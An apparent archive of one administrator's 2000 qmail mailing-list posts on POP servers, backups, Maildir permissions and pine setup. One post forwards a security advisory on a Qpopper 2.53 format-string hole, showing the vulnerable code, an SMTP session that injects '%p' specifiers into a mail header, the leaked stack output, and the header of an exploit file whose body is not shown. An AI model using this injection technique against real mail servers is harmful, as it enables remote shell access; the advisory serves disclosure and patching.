On Thu, 25 May 2000, listy-dyskusyjne Krzysztof Dabrowski wrote: There is realy no point in using qpopper. I have used it in isp enviroment and i can say that it sucks. It doesn't do any mailbox locking, it just copies the whole thing to temp dir back and forth. this kills the performace. (id 3.x better?). Qpopper works fine for us, there is also a server-mode directive to change this default behavior to be more like a regular pop server, it will NOT copy the file and cause chunking on the HD. You have a broad choice: a) qmail-pop3d - maildir only, lightweight, good maildir only, one downside b) cucipop - this is what i use at the moment, mailbox only, fast, small no longer supported, as has been mentioned, the last "version" was circa 1998. c) popa3d - by solar designer - small, fast, compatible, mailbox only i have no experience with this. d) solid pop3d - quality from Poland - like the above but with more features, maildir mailbox I have no experience with the above either. -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:25pm up 14 days, 17:51, 4 users, load average: 0.04, 0.08, 0.06
Qpopper 2.53 remote problem, user can gain gid=mail (fwd)
Havent seen this forwarded to the list, and it probably applies to quite a few people. Just in case someone isnt on bugtraq. BTW, in my source (2.53) i couldnt find any lines similar to what he suggests changing, perhaps he was looking at the FBSD ported version and it has been modified slightly, i dunno -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 1:20pm up 13 days, 18:46, 4 users, load average: 0.08, 0.22, 0.21 -- Forwarded message -- Date: Tue, 23 May 2000 09:43:33 -800 From: Prizm [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Qpopper 2.53 remote problem, user can gain [iso-8859-1] gid=mail I have attached to this message the advisory with full details + exploit on this problem. Prizm/b0f, _ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5 Advisory Name: Remote shell via Qpopper2.53 Date: 5/23/00 Application: Qpopper 2.53 for *NIX Vendor: Qualcomm Incorporated WWW: www.qualcomm.com Severity: can give users remote shell with gid=mail. Author: prizm ([EMAIL PROTECTED]) Homepage: b0f.freebsd.lublin.pl * Overview Qpopper is the most widely-used server for the POP3 protocol. This allows users to access their mail using any POP3 client. Qpopper supports the latest standards, and includes a large number of optional features. Qpopper is normally used with standard UNIX mail transfer and delivery agents such as sendmail or smail. * The Problem Yes, Qpop, again and again... There is a bug in version 2.53 of Qpop that can give you a remote shell with gid=mail. Problem is with euidl command which uses user input as format string for pop_msg() function. Lets examine following code from Qpop 2.53 source: -- pop_uidl.c, around line 150: sprintf(buffer, "%d %s", msg_id, mp-uidl_str); if (nl = index(buffer, NEWLINE)) *nl = 0; sprintf(buffer, "%s %d %.128s", buffer, mp-length, from_hdr(p, mp)); ! return (pop_msg (p,POP_SUCCESS, buffer)); ^ . Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, const char *format,...), and here we have user-input as format string. Lame. Ok, back to problem, imagine following smtp session: MAIL FROM:[EMAIL PROTECTED] 200 Ok RCPT TO:[EMAIL PROTECTED] 200 Ok data 200 Okey, okey. end with "." Subject: still trust qpop?=/ X-UIDL: From: %p%p%p%p%p%p%p test . 200 BLABLABLA Ok, message accepted for delivery. Then, luser connects with his pop account and runs euidl command there: +OK QPOP (version 2.53) at b0f starting. 666.666@b0f USER luser +OK Password required for luser. PASS secret +OK luser has 3 messages (1644 octets). euidl 3 +OK 2 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028 Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p where implemented as arguments for vsnprintf() command. * Exploiting Is this possible? Yeah, sure! But there are some limits. Qpopper2.53 from FreeBSD ports with patches is much more difficult to exploit than one from linux. It is because freebsd patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is big difference between them. Qpopper with FreeBSD's patches IS exploitable. Exploit --- /* qpop_euidl.c exploit by prizm/Buffer0verflow Security * * Sample exploit for buffer overflow in Qpopper 2.53. * This little proggie generates a mail u need to send. * * Standard disclaimer applies. * By the way, exploit is broken =) You need to insert shellcode. * * MAD greets to tf8 for pointing out the bug, and all other b0f members. * greets to USSRLabs and ADM *
Re: Qpopper 2.53 remote problem, user can gain gid=mail (fwd)
Unknown. The advisory specifically mentions 2.53 -- i can tell you this. 2.53 _was_ safe from the PREVIOUS exploits (ie. the ones that worked on the 2.51, etc) but this appears to be a new exploit in a different function of the program. Also, the advisory suggests upgrading to 3.1b1 (which i did) and says that it's a safe version (for now, anyway) Are there any known exploits for 2.1b1? On Wed, 24 May 2000, Scott D. Yelich wrote: -BEGIN PGP SIGNED MESSAGE- Wasn't it claimed that 2.53 was safe -- only earlier versions (alpha/beta?) were at risk? Seems like they should just release another version to lessen the confusion. Scott -BEGIN PGP SIGNATURE- Version: 2.6.2 iQCVAwUBOSwjblpGPE+AF6qBAQEiZwQAvICxK3K0VPNxX4v7agjf5owZ6ZtDPC9r 3egzkz30iQDHNSTNskPC8IQlVV4PBgthIjY7rJvFQBzE9zgRevF0MVvQ4+WdAeyM YLLl72l3pqr0y70qWfD72+6EyRwscb2yBaIvNK6Vk3/t58i8anL0iQO0aeIQYrvL cbNH+O6S74w= =ZbNr -END PGP SIGNATURE- -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 1:30pm up 13 days, 18:56, 4 users, load average: 0.16, 0.16, 0.17
Re: qmail IRC Channel
Since the qmail list delivers mail so quickly, it's almost like real time! :) On Tue, 23 May 2000, kapil sharma wrote: Is there any qmail IRC channel or chat? -- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:30am up 12 days, 16:56, 3 users, load average: 1.64, 0.52, 0.29
Re: How do you do it?
On Tue, 9 May 2000, Len Budney wrote: At FORE systems we had a phone support person who would shout those things, so loud that everybody in building one could hear it. He was astoundingly imaginative and colorful, and many of his remarks are not printable. Eventually, somebody spied on his work, and noticed that he was deftly using the mute button on his phone. He could interject these incredible outbursts, while speaking levelly and courteously at all times to the customer. Amazing. Len. That would work great, until your finger slipped off the mute button on accident, or it failed to work one time :) ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:15pm up 105 days, 19:12, 6 users, load average: 0.05, 0.28, 0.32
Re: How do you do it?
On Tue, 9 May 2000, Steve Wolfe wrote: Back in the day when I did tech support, that sort of thing wasn't uncommon at all. We were all pretty good at doing things like carrying on conversations with other techs, playing hackysack, etc., while helping customers, unbeknownst to them. Every once in a while, we'd get a "noisy" mute button that would click, and if they asked what it was, we'd just tell them in was phone noise. Well, i dont have a mute button on my phone here, but i just turn my speakers down and continue to frag people away in tribes... :) As to forgetting the mute button was on, I once found out the hard way that the phone's mute button *didn't work*, when I muttered "moron", and the customer heard me... : ) I've yelled "at" customers after i've hung up, but there have been times when i didnt hang up, and you never know if the customer heard you or not. You thought you hit the hang up button, but didnt, you know what i mean? :) I wish I could go on about the things that people said to me, the things I said to people, and the things I heard other techs say - but it would be a novel. Technical support is definitely a unique learning experience steve Oh god. I do tech support for the internet and computer store here, trust me, i have some doozies of my own :) ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:55pm up 105 days, 19:52, 6 users, load average: 0.37, 0.31, 0.45
Re: FW: Help with overwhelmed system
His disk has plenty of physical capacity left, but is out of inodes. He's asking if it's possible to increase the amount of inodes, since he still has space left. On Tue, 9 May 2000, Johan Almqvist wrote: Hi! On Tue, May 09, 2000 at 04:02:39PM -0400, Brad Johnson wrote: Hi; I'm running qmail on freebsd on a HP Vectra with 64megs of RAM and running into what I'm sure is a stupid and avoidable problem. Filesystem 1K-blocks UsedAvail Capacity iused ifree %iused Mounted on /dev/wd0s1a29766380875 19297530%1043 73835 1% / /dev/wd0s1f 1599187 404570 106668327% 65823 33564716% /usr /dev/wd0s1e396895 121201 24394333% 99832 6 100% /var procfs 440 100% 28 504 5% /proc Your /var partition is obviously full. Too bad. Move stuff in dirs under /var to other physical disks and soft link them back into /var? -Johan -- Johan Almqvist ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 3:20pm up 105 days, 22:17, 6 users, load average: 0.03, 0.11, 0.18
Re: Backing up HUGE Maildir systems
Yes, use rsync, and update frequently. This will backup the system and only 'backup' changes that are taking place, thus not requiring you to do a FULL backup. With this method however, you will lose any information that has changed between your rsync updates. On Thu, 4 May 2000, Tracy R Reed wrote: Anyone have any tips on how to effeciently backup Maildir systems with millions of files? I am pondering switching the company mail server over to Maildir. It's a very large and busy system. We have had situations before where there were millions of files to be backed up which took many days or perhaps even weeks to fully back up. In this case we were backing up from a NetApp to a DLT robot using NDMP. We never successfully finished a backup and ended up totally rearchitecting that setup but this won't be possible with the mail system. -- Tracy Reed http://www.ultraviolet.org My karma ran over your dogma. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:15am up 100 days, 17:12, 7 users, load average: 0.05, 0.09, 0.10
Re: Backing up HUGE Maildir systems
On Thu, 4 May 2000, Uwe Ohse wrote: On Thu, May 04, 2000 at 01:14:25AM -0700, Tracy R Reed wrote: Anyone have any tips on how to effeciently backup Maildir systems with millions of files? don't do it. Nobody likes getting duplicate mail. Doing backups has absolutely nothing to do with duplicate emails? I fail to see your point here? I am pondering switching the company mail server over to Maildir. It's a very large and busy system. We have had situations before where there Use a raid system. While a RAID system will protect you from certain failures (ie. hard drive crash) there are other failures that it cannot protect you against. Human error, hacker rm -rf'ing your server, etc, etc) whereas offsite, or off machine backups will. I would feel better knowing that my users precious mail is also backed up on RAID as well as on another machine/media. Im sure they would feel the same way as well. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:20am up 100 days, 17:17, 7 users, load average: 0.11, 0.11, 0.09
Re: Backing up HUGE Maildir systems
On Thu, 4 May 2000, Brian Johnson wrote: sends them off to a secondary server whenever they come in.. but nightly backups just don't cut it for e-mail.. -Brian As stated in previous email, rsync, 15 minute intervals ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:25am up 100 days, 18:22, 7 users, load average: 0.02, 0.06, 0.09
Re: hack for filtering i love you worm
For anyone using this filter, i'd like to hear feedback before i modify a production server. Also, should this interfere with vmailmgr? On Thu, 4 May 2000, Neil Schemenauer wrote: ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 4:05pm up 100 days, 23:02, 7 users, load average: 0.06, 0.59, 0.64
Re: Web front-end to mail service
Please excuse my quoting down below, the message i am replying to is pretty munged, so i'm not sure who said what. Regardless, let me try and help out... On Tue, 2 May 2000 [EMAIL PROTECTED] wrote: I stand corrected. Dave Sill also pointed out that any web front end tool, like sqwebmail, requires the use of mbox format in a central spool directory which is not too desirable to me. If anyone has any information on a more robust web front end tool, I would love to get it. Thanks, Tim We use a program here called qdpop. Written in perl, it can contact any normal POP server. It doesnt care what format your mailbox is in since it doesnt deal directly with the mbox. It goes through the POP server on that machine. The version we are running is pretty old, and doesnt have very many features, but it is simple and it works. There is no address book function, or even attachments. Just read/delete/reply/new message. The only downside that we've discovered is that the machine RUNNING the actual qdpop cgi/script will MAX out the load on the machine without tweaking when someone 'checks' their mail. What the original poster wanted was, amongst others, a way to remove messages for other users (i.e. customers) if their mailbox was over it's size limit... That's, IMHO, a completely different question than the one you're asking now ;-) Greetz, Steffan If all you want to do is to delete users messages, you can always 'telnet' to the pop server and do it by hand. It's quick, there is no need to download each message, just do a list and dele the proper files. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:10am up 98 days, 18:07, 6 users, load average: 0.06, 0.09, 0.09
Re: Three questions...
On Tue, 2 May 2000, Jeff Hayward wrote: The only thing that sendmail logs which qmail does not is the message-id. Of course, qmail doesn't write logs in sendmail format, which may be what the PHB wants. Write a perl script to reformat qmail/tcpserver logs in sendmail format. -- Jeff Hayward It is noteworthy to mention that qmail does create it's own ID's for tracking email, ie. May 2 11:30:40 ns1 qmail: 957288640.258690 new msg 67734 May 2 11:30:40 ns1 qmail: 957288640.259014 info msg 67734: bytes 1475 from [EMAIL PROTECTED] qp 21954 uid 1015 May 2 11:30:40 ns1 qmail: 957288640.294963 starting delivery 87111: msg 67734 to local [EMAIL PROTECTED] May 2 11:30:40 ns1 qmail: 957288640.717617 delivery 87111: success: did_1+0+0/ May 2 11:30:40 ns1 qmail: 957288640.717947 end msg 67734 ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:25am up 98 days, 18:22, 6 users, load average: 0.34, 0.24, 0.16
Re: mua for unix to read qmail's maildir
mutt.. http://freshmeat.net/search.php3?query=mutt On Mon, 24 Apr 2000, Jonathan Fortin wrote: Where can I get an Mua to read ~/Maildir, the qmail pine patch is really outdated and it doesnt work, thank you ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 6:10pm up 90 days, 1:07, 3 users, load average: 0.02, 0.10, 0.09
Someone else brought it up, and i noticed mine wasnt working :)
My local deliver to postmaster/root/mailer-daemon isnt working either, now that i check it.. Here's the info. This machine is running vmailmgrd and is working perfectly. Neither mail delivered to postmaster@ the local machine name, or at the virtual domain are being delivered. :/var/qmail/alias$ ls -la total 6 drwxr-sr-x 3 aliasqmail1024 Apr 18 19:17 ./ drwxr-xr-x 10 root qmail1024 Jan 1 1997 ../ -rw-r--r-- 1 root qmail 11 Apr 18 19:26 .qmail-mailer-daemon -rw-r--r-- 1 root qmail 11 Apr 18 19:26 .qmail-postmaster -rw-r--r-- 1 root qmail 11 Apr 18 19:26 .qmail-root -rw--- 1 root qmail 0 Jun 24 1999 Mailbox drwxr-xr-x 5 root qmail1024 Apr 18 19:17 Maildir/ :/var/qmail/alias$ ls -lr Maildir total 3 drwx--S--- 2 root qmail1024 Apr 18 19:17 tmp/ drwx--S--- 2 root qmail1024 Apr 18 19:17 new/ drwx--S--- 2 root qmail1024 Apr 18 19:17 cur/ [ekool@nivenh][date:Tue Apr 18][time:19:31:15] :/var/qmail/alias$ cat .qmail* ./Mailbox/ ./Mailbox/ ./Mailbox/ And from the log files... Apr 18 19:33:27 nivenh qmail: 956108007.758396 starting delivery 1140003: msg 225318 to local [EMAIL PROTECTED] Apr 18 19:33:27 nivenh qmail: 956108007.819392 delivery 1140003: deferral: Unable_to_chdir_to_maildir._(#4.2.1)/ I must have the permissions wrong on the Maildir, but i've changed them. I've also changed the contents of the alias files to reflect ./Maildir instead of ./Mailbox to no avail. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 7:30pm up 85 days, 2:27, 3 users, load average: 0.14, 0.16, 0.16
Re: pop 110 / daemontools / tcpserver / MySQL
the POP service shouldnt be run under supervise. It is started on a PER connection basis. You can either use /etc/inetd.conf to load your pop server, or use the (suggested method) and use tcpserver to invoke it. the LWQ web site is probably the best first stop for information. http://web.infoave.net/~dsill/lwq.html What format are you storing your email in? Maildir? If so, qmail-pop3d is reccomended, and the LWQ site should be able to walk you through it. On Wed, 19 Apr 2000, Mike Alexander Sauvain wrote: but i found no where any example how to make the pop service aviable. and now the final: after sucessfull mysql patch: http://www.softagency.co.jp/mysql/qmail2.en.html it changes these script ? ..thanks again..mike ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 8:05pm up 85 days, 3:02, 3 users, load average: 0.12, 0.22, 0.19
Re: Newbie.....
I've never tried this however, i have a couple ideas. You could setup 2 qmail machines or 2 qmail processes on one machine. Force one process/machine to use the other as a relay. Dont give the machine relay access for that IP, and it will only allow you to deliver mail to domains that are 'local' to it, or are in the rcpthosts file. What i've said might be totally confusing, or i might be trying to think of one of the most difficult ways to solve a simple problem, and i just dont know it =) On Mon, 17 Apr 2000, Markus Fischer wrote: On Mon, Apr 17, 2000 at 03:03:10PM -0300, Eduardo Moor wrote : I have been running qmail for Internet mail for almost a year without special problems :-). Could anyone tell me if there is any way to restrict access outside the local domain for some users, I don't want to allow them to send mail to the internet, but yes to the local domain. I'm not an expert in this. For those users, remove access to qmail-queue by chmod'ing it 4750 , chgrp into a group which is allowed to send email and put every user in this group. However, you can't prevent those users to send mail directory from your host to internet via port 25. At least not if you don't use smtp-auth. Anyone else comment about this thoughts ? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 2:45pm up 83 days, 21:42, 4 users, load average: 0.06, 0.17, 0.36
RE: network connection dies randomly? -- system hacked, its not QMAIL!
Unfortunately, plugging every hole can be more difficult then starting over. Plus, you'll always wonder. It's best to just start clean, and dont plug in the network until you get every hole patched. On Wed, 5 Apr 2000, John W. Lemons III wrote: Thanks to all that have replied, but I think I've found the culprit. I've been hacked using a "known" BIND weakness. (Unknown to me!) So, any way, I'll be cleaning up that mess this afternoon. :/ Anyone know if its safe to just verify/re-install the RPMs from CD, or should I wipe it and start over? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:20pm up 71 days, 19:17, 5 users, load average: 0.59, 0.43, 0.35
Re: bounces from a spam filter
On Wed, 29 Mar 2000, Derek B. Noonburg wrote: defaultdomain foolabs.com defaulthostfoolabs.com idhost foolabs.com locals localhost.localdomain me adsl-63-197-235-82.dsl.snfc21.pacbell.net plusdomain foolabs.com rcpthosts localhost.localdomain Locals and rcpthosts are bogus, but this shouldn't matter for outgoing mail, as I understand it. Me is ugly, but it's a valid host name that resolves to my IP address. Do I have a qmail configuration problem here? The only other thing I've noticed is that xyz.somewhere.gov attempts to talk to identd (port 113) on my system, which is being rejected by my firewall. Is it common for people to configure sendmail to refuse to accept mail from systems not running identd? - Derek Derek, it's possible that the site you are trying to send mail to has pacbell's DSL IP range in its filters, much like many ISP's filter out AOL dialups, etc, etc. In this case, you may wish to make friends with someone close that runs an SMTP server on non filtered space. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 4:40pm up 65 days, 37 min, 4 users, load average: 0.10, 0.11, 0.13
Re: Still can't run qmail from init script
On Wed, 29 Mar 2000, Stephen F. Bosch wrote: Mikko Hänninen wrote: What shell are you using? Judging from the output, bash. The "b" was missing, so I couldn't be sure. Ash could be a shell, who am I to say? =) There is a shell called ash :) (ekool@ns1)(2/ttyp3)(05:26pm:03/29/00)- ($:~)- ls -l /bin/ash -rwxr-xr-x 1 root bin 61201 Aug 6 1995 /bin/ash* ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 5:20pm up 65 days, 1:17, 4 users, load average: 0.08, 0.11, 0.13
Re: Using Mailbox under Pine
We use pine here on this machine, what's needed is:
($:~)- cat /etc/pine.conf | grep -A 3 -B 3 MailBox
# Path of (local or remote) INBOX, e.g. ={mail.somewhere.edu}inbox
# Normal Unix default is the local INBOX (usually /usr/spool/mail/$USER).
inbox-path=~/MailBox
# List of incoming msg folders besides INBOX, e.g. ={host2}inbox,
{host3}inbox
# Syntax: optnl-label {optnl-imap-host-name}folder-path
also, make sure that your NEW users do not currently have a pine.conf or
if so, you need to modify it.
Also, you will get an error if a MailBox file does not exist, but just
send mail to the user or touch the MailBox file with the proper perms and
that will fix it.
On Tue, 28 Mar 2000, Andy Bradford wrote:
Thus said Philip Mores on Wed, 29 Mar 2000 10:17:12 +0800:
How can I configure pine using Mailbox instead of using
/var/spool/mail/user ? I tried following the procedure but it doesn't
work. Pine has an error something like "no folder".
I believe if you set MAIL to $HOME/Mailbox pine will work just fine
with ./Mailbox
In bash this is done like so:
export MAIL=$HOME/Mailbox
Getting it to work with ./Maildir/ on the other hand may require a bit
more work...
Andy
___ _ __ _
__ /___ ___ /__ John Gonzalez/Net.Tech
__ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC!
_ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052
/_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com
[-[system info]---]
9:50pm up 64 days, 5:47, 4 users, load average: 0.04, 0.13, 0.16
RE: Forward and retain a copy
Yes, we do this for customers that want a copy of their email, plus a copy sent to a pager, or any other device :) Modify your .qmail file in the home directory, and just put each recipient on a seperate line in the file. [EMAIL PROTECTED] ./Mailbox or whatever format you are storing in. On Thu, 9 Mar 2000, Stephen Bosch wrote: Is there a way in qmail to forward a copy of an e-mail to another accoutn but still retain a copy on my server for archive purposes. Example [EMAIL PROTECTED] receives and e-mail a copy is sent to thier aol account but mydomain.com's mail server retains a copy. I've always just put the local address and the forward address in the .forward file -- that's never caused a loop so I'm assuming that the MTA knows enough to interpret this as a request to leave a copy in the local mailbox. Of course, that was with sendmail... I don't actually know what qmail does, since I haven't had to use this since I started using qmail. Anybody else? -Stephen- ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 2:30pm up 44 days, 22:27, 4 users, load average: 0.50, 0.52, 0.46
Re: Encryption and t-shirts
On Thu, 2 Mar 2000, Vern Hart wrote: The latest round of designs are at http://vern.com/tshirts/qmail/ They are the above quote, plus the anti-sendmail quote. Both with each logo version. Let me know the latest round of critiques. Vern, those look great. I'll take one of each with the 'Q' logo, not the dolphin. :) ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:20am up 37 days, 18:17, 5 users, load average: 0.02, 0.11, 0.09
Re: O-T: Announce: safecat-1.2 is available
I never saw Len follow up this message later on with the correct address, and certainly localhost will not bring up the page for me =) for those that were too lazy to give it a shot, the following addresses worked: http://www.nb.net/~lbudney/linux/software/safecat/performance.html On Tue, 29 Feb 2000, Len Budney wrote: Safecat 1.2 is available. Changes: Complete rewrite using DJB libraries, including buffered I/O. Speedup of about 1.4 for actual email messages. Now writes "Delivered-To:" and "Return-Path:" headers when DTLINE and RPLINE environment variables are set. Of interest: http://localhost/~lbudney/linux/software/safecat/performance.html A summary of the recent performance discussion on qmail. http://localhost/~lbudney/linux/software/safecat/COPYING.txt My own solution to the problems of Dan's unclear licensing. It boils down to, ``If you don't bother Dan, he probably doesn't care.'' Len. -- I'm criticizing one program. That program is disgustingly insecure. It shouldn't just be ridiculed---it should be taken out and shot. -- Dan Bernstein, author of qmail ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 8:55pm up 36 days, 4:52, 4 users, load average: 0.19, 0.25, 0.21
Re: Qmail Packages
On Tue, 29 Feb 2000, Russell Nelson wrote: Oh neat! A *new* gratuitious incompatibility! How clever! 2) _IF_ we decide to distribute this its under gpl right? Nope. You can't distribute qmail sources or binaries with a modified qmail-conf. -- -russ nelson [EMAIL PROTECTED] http://russnelson.com To be more specific, I believe you cannot distribute a modified qmail source or binary, at all, correct? Nothing can be modified, or am i wrong? And, the above example is specifically why the license is the way it is :) Support headaches, incompatible nightmares, etc, etc. Now maybee the qmail license haters may realize at least partially, the logic. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:05pm up 36 days, 6:02, 4 users, load average: 0.09, 0.16, 0.19
RE: shell-init: could not get current directory
